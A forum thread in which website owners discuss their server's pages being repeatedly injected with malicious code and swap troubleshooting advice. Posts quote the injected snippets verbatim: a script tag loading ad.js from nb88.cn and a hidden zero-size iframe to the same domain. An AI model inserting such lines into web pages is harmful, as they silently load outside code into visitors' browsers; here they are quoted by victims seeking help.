cool da man

I have a huge problem with pages on my server being hijacked. A snippet of code gets added after the end of a closed html tag. the code contain a link to a website with javascript or iframe tags.

This code basically open dozens of websites (popups) there fore disabling my website.

The code appears on different pages within the site every 2-4hours even when is change permissions to the actual file. it seems to be copying the file each time and overwriting it.

the code contains the following data,
coon.js
nb88.cn

I have change the permission for each folder on the server but its still comes back.

Also ive noticed that the code does not appear when i have 2 connections open to the server using Terminal Services, but as soon as 1 closes the code appears.

I need a solutions to this, any comments are welcome.

brettrigby

Hello!

I have had the same problem for over a week and I could NOT find out where this sucker had come from! Nor could I find out where to fix it!

I replaced my AntiVirus on the webserver and scanned it until I was blue in the face. I ran HiJackThis - still nothing.

I even resorted to offering to pay someone to fix it for me, and whilst on the phone to the company that I pay for the server, I had a flash of inspiration and found the little bar steward.

The line of text that was appearing in the source code of my website linking my site to this nb88.cn and coon.js was inside one of my ASP include files, right at the bottom!!

It was tagged right at the end, and as this was a good file to pick on as it is called by almost every page, thats why its appeared to mess my entire site up.

One way of searching for it is to search your online files for the text 'nb88' and open each file and remove it. Alternatively, re-upload your entire site, and hopefully it will be deleted.

I hope this helps!

Brett

O~Snapple

I bet you have I Power Web, I had the same problem with them and i recently switched hosting companies, The worst is when i called to tell them they said well it sounds like someone hacked your page. I said you freaking Idiot they hacked your server!

~Snapple

__________________
The Real Truth
Epademik Emcee Esq. New Album The 3rd Finger is in Stores Now!
Snap Marketing Management and Consulting

cool da man

Hi brettrigby, thanks for the info. I have already reuploaded the site and even reinstalled iis thinking maybe the metabase had been hacked or something but the code still reiinfects the asp includes, even more it is now started to appear on javascript includes also.

It is really frustrating as I have only found brick walls at the moment.

any further information you could shed on the matter would be appreciated.

Thanks in advance

coolk

dtmtsp

Have you tried doing a rootkit scan? Try rootkitrevealer from sysinternals.

__________________
http://www.liwebhosting.com - Web Hosting Accounts

brettrigby

Alas, it appears that I have spoken too soon!

A couple of days (if that!!) since I had erradicated the script from my ASP 'include' pages, it has returned.

It seems until I can resolve this, the only way I can regain normal usage of my website is to RDP to my web server, manually scan for all files that contain the text 'nb88' and manually open them and scroll straight to the bottom and whip out the last line and the break-line that it also puts in too.

As soon as they are saved, the site resumes normal activity.

Is there any chance that IIS could be infected or damaged?

Also, it might be worth noting that the file that script inside my files has altered slightly. The file it used to call was 'coon.js', but the end of last week I noticed it was something else. I have already deleted it this morning, but will take note when it happens next and post back the new filename, in the hope that someone else is being annoyed by this and find our thread!!

More to follow!

Brett

tigertom

Get a 'clean' copy of your site, then ....

Change web host.
Change web host.
Change web host.

Or you can keep doing what you're doing.

More:

How To Protect Your Web Site From Hackers
Protect Your Web Site Content

brettrigby

Hello again,

Well, as expected, here again with woes of my scripting virus!

"

<script language="JavaScript" src="http://nb88.cn/js/ad.js"></script>"

is the code (including the blank line) is the code that this devil is inserting to 3 or 4 of my include files.

As I said, this is different from before... now it is linking to ad.js and not coon.js... in case that helps!!

Cheers for the suggestion TigerTom, but it's not really that easy to change hosts.

Until next time.

Brett

O~Snapple

I disagree Changing Hosts is as easy as you make it just make sure you communicate exactly what you need, and that it will support your site.

I had a great expierence changing my host from I Power Web to Go Daddy



~Snapple

__________________
The Real Truth
Epademik Emcee Esq. New Album The 3rd Finger is in Stores Now!
Snap Marketing Management and Consulting

brettrigby

Hello again,

This is becoming a pain now. Every day, I have to delete the extra lines from two of my ASP include files.

Also, the code has changed to...

"

<iframe src=http://nb88.cn/index.html width="0" height="0"></iframe>"

Any news or information on this is greatly appreciated!!

Brett